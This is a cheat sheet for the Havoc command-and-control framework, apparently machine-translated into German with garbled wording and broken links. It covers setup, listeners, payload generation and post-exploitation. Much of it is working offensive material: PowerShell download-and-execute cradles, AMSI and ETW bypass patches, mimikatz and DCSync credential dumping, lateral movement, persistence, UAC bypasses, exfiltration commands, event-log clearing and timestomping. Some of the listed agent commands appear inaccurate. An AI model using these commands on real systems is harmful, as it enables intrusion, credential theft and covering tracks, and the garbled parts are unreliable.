Havoc C2 Framework Cheat Sheet
Überblick
Havoc ist ein modernes, mißbräuchliches Kommando- und Steuerungskonzept (C2) für rote Teamoperationen mit Fokus auf Betriebssicherheit und Evasion. Mit einer modularen Architektur gebaut, bietet Havoc erweiterte Nachbenutzungsfunktionen, unterstützt mehrere Kommunikationsprotokolle und bietet umfangreiche Anpassungsmöglichkeiten für anspruchsvolle Gegneremulation.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation
Voraussetzungen
```bash
Install dependencies (Ubuntu/Debian)
sudo apt update sudo apt install -y build-essential cmake pkg-config libssl-dev libpq-dev python3-dev python3-pip golang-go
Install Qt5 development libraries
sudo apt install -y qtbase5-dev qtchooser qt5-qmake qtbase5-dev-tools
Install Python dependencies
pip3 install --user PyQt5 requests ```_
Aufbau von Source
```bash
Clone Havoc repository
git clone https://github.com/HavocFramework/Havoc.git cd Havoc
Build teamserver
cd teamserver go mod download make
Build client
cd ../client make
Verify build
ls -la bin/ ```_
Docker Installation
```bash
Clone repository
git clone https://github.com/HavocFramework/Havoc.git cd Havoc
Build Docker image
docker build -t havoc-teamserver -f teamserver/Dockerfile .
Run teamserver container
docker run -d --name havoc-ts -p 40056:40056 -p 443:443 -p 80:80 havoc-teamserver
Build client Docker image
docker build -t havoc-client -f client/Dockerfile .
Run client container
docker run -it --name havoc-client -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix havoc-client ```_
Kali Linux Installation
```bash
Install from Kali repositories (if available)
sudo apt update sudo apt install havoc-c2
Or build from source
git clone https://github.com/HavocFramework/Havoc.git cd Havoc sudo apt install -y build-essential cmake pkg-config libssl-dev qtbase5-dev cd teamserver && make cd ../client && make ```_
Konfiguration
Teamserver Setup
```yaml
teamserver/profiles/havoc.yaotl
Teamserver: Host: "0.0.0.0" Port: 40056
Build: Compiler64: "/usr/bin/x86_64-w64-mingw32-gcc" Compiler86: "/usr/bin/i686-w64-mingw32-gcc" Nasm: "/usr/bin/nasm"
# SSL Configuration Certs: Cert: "data/x509-server.crt" Key: "data/x509-server.key"
Operators: - Name: "admin" Password: "password123"
- Name: "operator1" Password: "redteam2024"
Listeners: - Name: "HTTP Listener" Protocol: "Http" Host: "192.168.1.100" Port: 80
- Name: "HTTPS Listener" Protocol: "Https" Host: "secure.example.com" Port: 443 Cert: "data/cert.pem" Key: "data/key.pem" ```_
SSL Zertifikat Generation
```bash
Generate self-signed certificate
openssl req -new -x509 -keyout data/x509-server.key -out data/x509-server.crt -days 365 -nodes -subj "/C=US/ST=State/L=City/O=Organization/CN=havoc-server"
Generate certificate for HTTPS listener
openssl req -new -x509 -keyout data/cert.pem -out data/cert.pem -days 365 -nodes -subj "/C=US/ST=State/L=City/O=Organization/CN=secure.example.com"
Set proper permissions
chmod 600 data/.key data/.pem ```_
Malleable C2 Profil
```c
profiles/amazon.profile
set sample_name "Amazon";
set sleeptime "30000"; set jitter "20"; set maxdns "255"; set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36";
http-get \\{ set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books";
client \\\\{
header "Host" "www.amazon.com";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Accept-Language" "en-US,en;q=0.5";
header "Accept-Encoding" "gzip, deflate";
header "Connection" "keep-alive";
metadata \\\\{
base64url;
parameter "field-keywords";
\\\\}
\\\\}
server \\\\{
header "Server" "Server";
header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT";
header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVqZmduZXJlaGZ0b2VoZmQ=";
output \\\\{
netbios;
prepend "<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\">";
prepend "<html><head><title>Amazon.com: Online Shopping for Electronics, Apparel, Computers, Books, DVDs & more</title>";
append "</html>";
print;
\\\\}
\\\\}
\\}
http-post \\{ set uri "/N4215/adj/amzn.us.sr.aps";
client \\\\{
header "Host" "www.amazon.com";
header "Accept" "*/*";
header "Accept-Language" "en-US,en;q=0.5";
header "Accept-Encoding" "gzip, deflate";
header "Content-Type" "text/xml";
header "Connection" "keep-alive";
id \\\\{
base64url;
parameter "sz";
\\\\}
output \\\\{
base64url;
parameter "tile";
\\\\}
\\\\}
server \\\\{
header "Server" "Server";
output \\\\{
netbios;
prepend "0";
append "";
print;
\\\\}
\\\\}
\\} ```_
Basisnutzung
Teamserver starten
```bash
Start teamserver with default profile
cd teamserver ./teamserver -profile profiles/havoc.yaotl
Start with custom profile
./teamserver -profile profiles/custom.yaotl
Start with debug mode
./teamserver -profile profiles/havoc.yaotl -debug
Start with specific bind address
./teamserver -profile profiles/havoc.yaotl -bind 0.0.0.0:40056 ```_
Client-Verbindung
```bash
Start Havoc client
cd client ./Havoc
Connect to teamserver
-
Enter teamserver details:
- Host: 192.168.1.100
- Port: 40056
- Username: admin
- Password: password123
-
Click Connect ```_
Web Interface
```bash
Access web interface (if enabled)
https://192.168.1.100:40056/web
Default credentials
Username: admin Password: password123 ```_
Hörer Management
HTTP Listener
```bash
Create HTTP listener via GUI
- Navigate to Listeners tab
- Click "Add Listener"
- Configure parameters:
- Name: HTTP-80
- Protocol: HTTP
- Host: 192.168.1.100
- Port: 80
- User Agent: Mozilla/5.0...
- Headers: Custom headers
Via configuration file
Listeners: - Name: "HTTP Listener" Protocol: "Http" Host: "192.168.1.100" Port: 80 UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" Headers: - "Accept: text/html,application/xhtml+xml" - "Accept-Language: en-US,en;q=0.9" ```_
HTTPS Hörer
```bash
Create HTTPS listener
- Navigate to Listeners tab
- Click "Add Listener"
- Configure parameters:
- Name: HTTPS-443
- Protocol: HTTPS
- Host: secure.example.com
- Port: 443
- Certificate: /path/to/cert.pem
- Private Key: /path/to/key.pem
- User Agent: Custom UA string
Advanced HTTPS configuration
Listeners: - Name: "HTTPS Listener" Protocol: "Https" Host: "secure.example.com" Port: 443 Cert: "certs/server.crt" Key: "certs/server.key" UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" Secure: true HSTS: true ```_
BMB Hörer
```bash
Create SMB listener for lateral movement
- Navigate to Listeners tab
- Click "Add Listener"
- Configure parameters:
- Name: SMB-445
- Protocol: SMB
- Named Pipe: \.\pipe\msagent_##
- Host: 192.168.1.100
- Port: 445
SMB configuration
Listeners: - Name: "SMB Listener" Protocol: "Smb" PipeName: "msagent_ab" Host: "192.168.1.100" Port: 445 ```_
Nutzlasterzeugung
Demon Agent (Windows)
```bash
Generate Demon payload via GUI
- Navigate to Payloads tab
- Click "Generate Payload"
- Configure parameters:
- Agent: Demon
- Listener: HTTP-80
- Architecture: x64
- Format: Windows Executable
- Indirect Syscalls: Enabled
- Sleep Obfuscation: Enabled
Advanced Demon configuration
Payload: Agent: "Demon" Listener: "HTTP-80" Arch: "x64" Format: "Windows Executable" Config: Sleep: 5 Jitter: 20 IndirectSyscalls: true SleepObfuscation: true ProxyLoading: true AmsiBypass: true EtwBypass: true ```_
Shellcode Generation
```bash
Generate shellcode
- Navigate to Payloads tab
- Select "Generate Payload"
- Configure parameters:
- Agent: Demon
- Listener: HTTPS-443
- Format: Shellcode (bin)
- Architecture: x64
- Obfuscation: Enabled
Use generated shellcode
Inject into process
Use with custom loaders
Integrate with other frameworks
```_
PowerShell Payload
```powershell
Generate PowerShell payload
- Navigate to Payloads tab
- Select "Generate Payload"
- Configure parameters:
- Agent: Demon
- Listener: HTTP-80
- Format: PowerShell
- Obfuscation: Enabled
Generated PowerShell example
$s='192.168.1.100';$p=80;$u='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'; $wc=New-Object System.Net.WebClient;$wc.Headers.Add('User-Agent',$u); $wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials; $k=$wc.DownloadData("http://$s:$p/");IEX([System.Text.Encoding]::ASCII.GetString($k));
Execute on target
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/payload.ps1')" ```_
DLL Payload
```bash
Generate DLL payload
- Navigate to Payloads tab
- Select "Generate Payload"
- Configure parameters:
- Agent: Demon
- Listener: HTTPS-443
- Format: Windows DLL
- Architecture: x64
- Export Function: DllMain
Load DLL on target
rundll32.exe payload.dll,DllMain
Or via PowerShell
```_
Personalmanagement
Demon Agent Commands
```bash
Basic system information
whoami # Current user context hostname # Computer name pwd # Current directory ls # List directory contents cd [path] # Change directory cat [file] # Read file contents ps # List processes env # Environment variables
File operations
download [file] # Download file from target upload [local] [remote] # Upload file to target mkdir [directory] # Create directory rm [file] # Remove file cp [source] [dest] # Copy file mv [source] [dest] # Move file ```_
Prozessmanagement
```bash
Process operations
ps # List all processes ps -u [user] # List processes by user kill [pid] # Terminate process killall [name] # Kill processes by name
Process injection
inject [pid] [shellcode] # Inject shellcode into process hollowing [target] [payload] # Process hollowing doppelganging [target] [payload] # Process doppelganging
Token manipulation
steal_token [pid] # Steal process token make_token [user] [pass] [domain] # Create new token rev2self # Revert to original token ```_
Einrichtende Operationen
```bash
Credential harvesting
mimikatz [command] # Execute Mimikatz commands logonpasswords # Dump logon passwords lsadump # Dump LSA secrets sam # Dump SAM database cache # Dump cached credentials
Kerberos attacks
kerberoast # Kerberoasting attack asreproast # AS-REP roasting dcsync [user] # DCSync attack golden [options] # Golden ticket creation silver [options] # Silver ticket creation ```_
Spätere Bewegung
```bash
Remote execution
psexec [target] [command] # PSExec execution wmiexec [target] [command] # WMI execution smbexec [target] [command] # SMB execution winrm [target] [command] # WinRM execution
Credential-based movement
pth [hash] [target] [command] # Pass-the-hash ptk [ticket] [target] [command] # Pass-the-ticket
Service manipulation
sc [target] create [service] [binary] # Create service sc [target] start [service] # Start service sc [target] stop [service] # Stop service sc [target] delete [service] # Delete service ```_
Erweiterte Funktionen
SOCKEN Proxy
```bash
Start SOCKS proxy
socks start [port] # Start SOCKS4/5 proxy on port socks list # List active SOCKS proxies socks stop [id] # Stop SOCKS proxy
Use with external tools
proxychains -f /etc/proxychains.conf nmap -sT 192.168.1.0/24 proxychains firefox proxychains msfconsole ```_
Port Forwarding
```bash
Local port forwarding
portfwd add [local_port] [remote_host] [remote_port] portfwd list # List active port forwards portfwd remove [id] # Remove port forward
Reverse port forwarding
rportfwd add [remote_port] [local_host] [local_port] rportfwd list # List reverse port forwards rportfwd remove [id] # Remove reverse port forward ```_
Persistenzmechanismen
```bash
Registry persistence
persist registry [key] [value] [payload] # Registry autorun persist startup [name] [payload] # Startup folder persist service [name] [payload] # Windows service
Scheduled task persistence
persist schtask [name] [trigger] [payload] # Scheduled task persist wmi [filter] [consumer] [payload] # WMI event subscription
Advanced persistence
persist com [clsid] [payload] # COM hijacking persist dll [target] [payload] # DLL hijacking ```_
Vorrechte Eskalation
```bash
UAC bypass techniques
uacbypass [method] [payload] # Various UAC bypass methods eventvwr [payload] # Event Viewer UAC bypass fodhelper [payload] # FodHelper UAC bypass computerdefaults [payload] # Computer Defaults UAC bypass
Kernel exploits
exploit ms16-032 [payload] # Secondary Logon Handle EoP exploit ms16-135 [payload] # Windows Kernel-Mode Drivers EoP exploit cve-2021-1675 [payload] # PrintNightmare ```_
Daten Exfiltration
```bash
File exfiltration
exfil http [file] [url] # HTTP exfiltration exfil dns [file] [domain] # DNS exfiltration exfil smb [file] [share] # SMB exfiltration
Database exfiltration
exfil sql [connection] [query] # SQL database exfiltration exfil ldap [server] [query] # LDAP exfiltration
Steganography
exfil stego [file] [image] # Hide data in image exfil stego [file] [audio] # Hide data in audio ```_
Evasion Techniken
AMSI Bypass
```csharp // AMSI bypass implementation in Demon public static void BypassAMSI() \\{ try \\{ var amsiDll = LoadLibrary("amsi.dll"); var amsiScanBuffer = GetProcAddress(amsiDll, "AmsiScanBuffer");
var patch = new byte[] \\\\{ 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 \\\\};
var oldProtect = VirtualProtect(amsiScanBuffer, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, amsiScanBuffer, patch.Length);
VirtualProtect(amsiScanBuffer, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch (Exception ex)
\\\\{
// Handle exception
\\\\}
\\} ```_
ETW Bypass
```csharp // ETW bypass implementation public static void BypassETW() \\{ try \\{ var ntdll = LoadLibrary("ntdll.dll"); var etwEventWrite = GetProcAddress(ntdll, "EtwEventWrite");
var patch = new byte[] \\\\{ 0xC3 \\\\}; // ret instruction
var oldProtect = VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, etwEventWrite, patch.Length);
VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch (Exception ex)
\\\\{
// Handle exception
\\\\}
\\} ```_
Schlafstörung
```c // Sleep obfuscation in Demon agent void SleepObfuscation(DWORD dwMilliseconds) \\{ CONTEXT ctx = \\{ 0 \\}; HANDLE hTimer = NULL; LARGE_INTEGER liDueTime = \\{ 0 \\};
// Create waitable timer
hTimer = CreateWaitableTimer(NULL, TRUE, NULL);
if (!hTimer) return;
// Set timer
liDueTime.QuadPart = -10000LL * dwMilliseconds;
SetWaitableTimer(hTimer, &liDueTime;, 0, NULL, NULL, FALSE);
// Encrypt agent in memory
EncryptAgent();
// Wait for timer
WaitForSingleObject(hTimer, INFINITE);
// Decrypt agent
DecryptAgent();
CloseHandle(hTimer);
\\} ```_
Indirekte Syscalls
```asm ; Indirect syscall implementation .code
IndirectSyscall PROC mov r10, rcx mov eax, edx jmp qword ptr [r8] IndirectSyscall ENDP
; Usage in C NTSTATUS IndirectNtAllocateVirtualMemory( HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect ) \\{ return IndirectSyscall(ProcessHandle, 0x18, SyscallAddress); \\} ```_
Automatisierung und Schrift
Python Automation
```python
Havoc automation script
import requests import json import time
class HavocAPI: def init(self, host, port, username, password): self.base_url = f"https://\\{host\\}:\\{port\\}/api" self.session = requests.Session() self.session.verify = False self.authenticate(username, password)
def authenticate(self, username, password):
auth_data = \\\\{
"username": username,
"password": password
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/auth", json=auth_data)
if response.status_code == 200:
self.token = response.json()["token"]
self.session.headers.update(\\\\{"Authorization": f"Bearer \\\\{self.token\\\\}"\\\\})
def get_demons(self):
response = self.session.get(f"\\\\{self.base_url\\\\}/demons")
return response.json()
def execute_command(self, demon_id, command):
task_data = \\\\{
"demon_id": demon_id,
"command": command
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/tasks", json=task_data)
return response.json()
def automated_recon(self, demon_id):
"""Automated reconnaissance on new demon"""
commands = [
"whoami",
"hostname",
"pwd",
"ps",
"netstat -an",
"ipconfig /all",
"systeminfo"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(demon_id, cmd)
time.sleep(2)
# Credential harvesting if elevated
if self.is_elevated(demon_id):
self.execute_command(demon_id, "mimikatz logonpasswords")
Usage
havoc = HavocAPI("192.168.1.100", 40056, "admin", "password123") demons = havoc.get_demons()
for demon in demons: if demon["status"] == "active": havoc.automated_recon(demon["id"]) ```_
PowerShell Automation
```powershell
PowerShell automation for Havoc
function Invoke-HavocAutomation \\{ param( [string]$HavocServer = "192.168.1.100", [int]$Port = 40056, [string]$Username = "admin", [string]$Password = "password123" )
# Authenticate to Havoc API
$authData = @\\\\{
username = $Username
password = $Password
\\\\}|ConvertTo-Json
$authResponse = Invoke-RestMethod -Uri "https://$HavocServer:$Port/api/auth" -Method POST -Body $authData -ContentType "application/json" -SkipCertificateCheck
$token = $authResponse.token
$headers = @\\\\{
"Authorization" = "Bearer $token"
"Content-Type" = "application/json"
\\\\}
# Get active demons
$demons = Invoke-RestMethod -Uri "https://$HavocServer:$Port/api/demons" -Headers $headers -SkipCertificateCheck
foreach ($demon in $demons) \\\\{
if ($demon.status -eq "active") \\\\{
Write-Host "[+] Processing demon: $($demon.id)"
# Execute reconnaissance commands
$commands = @("whoami", "hostname", "ps", "netstat -an")
foreach ($cmd in $commands) \\\\{
$taskData = @\\\\{
demon_id = $demon.id
command = $cmd
\\\\}|ConvertTo-Json
Invoke-RestMethod -Uri "https://$HavocServer:$Port/api/tasks" -Method POST -Body $taskData -Headers $headers -SkipCertificateCheck
Start-Sleep -Seconds 2
\\\\}
\\\\}
\\\\}
\\}
Execute automation
Invoke-HavocAutomation ```_
Bash Automation
```bash
!/bin/bash
Havoc automation script
HAVOC_SERVER="192.168.1.100" HAVOC_PORT="40056" USERNAME="admin" PASSWORD="password123"
Authenticate and get token
TOKEN=$(curl -s -k -X POST "https://$HAVOC_SERVER:$HAVOC_PORT/api/auth" \ -H "Content-Type: application/json" \ -d "\\{\"username\":\"$USERNAME\",\"password\":\"$PASSWORD\"\\}"|\ jq -r '.token')
Function to execute command on demon
execute_command() \\{ local demon_id=$1 local command=$2
curl -s -k -X POST "https://$HAVOC_SERVER:$HAVOC_PORT/api/tasks" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d "\\\\{\"demon_id\":\"$demon_id\",\"command\":\"$command\"\\\\}"
\\}
Get active demons
DEMONS=$(curl -s -k -H "Authorization: Bearer $TOKEN" \ "https://$HAVOC_SERVER:$HAVOC_PORT/api/demons"|\ | jq -r '.[] | select(.status=="active") | .id') |
Execute commands on each demon
for demon_id in $DEMONS; do echo "[+] Processing demon: $demon_id"
# Reconnaissance commands
commands=("whoami" "hostname" "ps" "netstat -an" "ipconfig")
for cmd in "$\\\\{commands[@]\\\\}"; do
echo "[+] Executing: $cmd"
execute_command "$demon_id" "$cmd"
sleep 2
done
done ```_
Integration mit anderen Tools
Metasploit Integration
```bash
Use Havoc with Metasploit
Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
Upload via Havoc demon
upload meterpreter.exe C:\Windows\Temp\update.exe
Execute Metasploit payload
shell C:\Windows\Temp\update.exe
Handle in Metasploit
msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 192.168.1.100 set LPORT 8443 run ```_
Cobalt Strike Integration
```bash
Beacon integration
Generate Cobalt Strike beacon
Use Havoc for initial access, pivot to Beacon
From Havoc demon
shell powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
Handle in Cobalt Strike team server
```_
BlutHound Integration
```bash
Collect BloodHound data via Havoc
Upload SharpHound to target
upload SharpHound.exe C:\Windows\Temp\collector.exe
Run BloodHound collection
shell C:\Windows\Temp\collector.exe -c All -d domain.local
Download collected data
download C:\Windows\Temp*BloodHound.zip
Import into BloodHound
neo4j start ./BloodHound --no-sandbox ```_
Operationelle Sicherheit
Kommunikationssicherheit
```bash
Domain fronting configuration
Configure CDN (CloudFlare, AWS CloudFront)
Set up domain fronting rules
Update listener configuration
Certificate management
Use legitimate SSL certificates
Implement certificate pinning
Regular certificate rotation
```_
Verkehrsobfukation
```bash
Malleable C2 profiles
Mimic legitimate applications
Use realistic timing and jitter
Implement traffic shaping
Custom user agents
Match target environment
Use legitimate application signatures
Implement user agent rotation
```_
Anti-Forensik
```bash
Event log clearing
shell wevtutil cl System shell wevtutil cl Security shell wevtutil cl Application
Timestomping
shell powershell -c "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"
Memory cleanup
Implement secure memory wiping
Use process migration
Clear command history
```_
Fehlerbehebung
Gemeinsame Themen
```bash
Demon not connecting
- Check firewall rules
- Verify listener configuration
- Test network connectivity
- Check antivirus interference
SSL certificate issues
Regenerate certificates
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
Performance issues
Increase demon sleep time
Optimize task execution
Use multiple listeners
```_
Debug Mode
```bash
Enable debug logging
./teamserver -profile profiles/havoc.yaotl -debug
Check logs
tail -f logs/teamserver.log
Network troubleshooting
Use Wireshark to analyze traffic
Check for network filtering
Verify DNS resolution
```_
Datenbankprobleme
```bash
Reset database
rm -rf data/havoc.db ./teamserver -profile profiles/havoc.yaotl
Backup database
cp data/havoc.db data/havoc.db.backup
Restore database
cp data/havoc.db.backup data/havoc.db ```_
Best Practices
Betriebsplanung
- ** Voreinstellung**: Profile und Zuhörer vor dem Eingriff konfigurieren
- Teamkoordination: Bedienermanagement für Teamkooperation nutzen
- ** Kommunikationsprotokolle*: klare C2-Kommunikationskanäle einrichten
- Datenhandling: Implementierung sicherer Datenerfassung und Exfiltration
- *Cleanup-Verfahren: Plan zur Artefaktentfernung und Betriebsreinigung
Sicherheitsüberlegungen
```bash
Secure deployment
Use strong authentication
Enable HTTPS with valid certificates
Implement network segmentation
Regular security updates
Agent management
Use unique agent configurations
Implement kill dates
Regular agent rotation
Secure communication channels
```_
Dokumentation und Reporting
```bash
Operation documentation
Maintain detailed logs
Document all activities
Track compromised systems
Generate executive reports
Artifact tracking
Monitor IOCs
Document forensic artifacts
Implement attribution prevention
```_
Ressourcen
- [Havoc GitHub Repository](LINK_5 -%20Dokumentation
- [Havoc Community Discord](LINK_5 -%20[Red%20Team%20Village%20Havoc%20Training](LINK_5 -%20(SANS%20Red%20Team%20Operations)(LINK_5)
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Havoc C2 Rahmen. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Durchführung von roten Team-Operationen oder Penetrationstests haben. *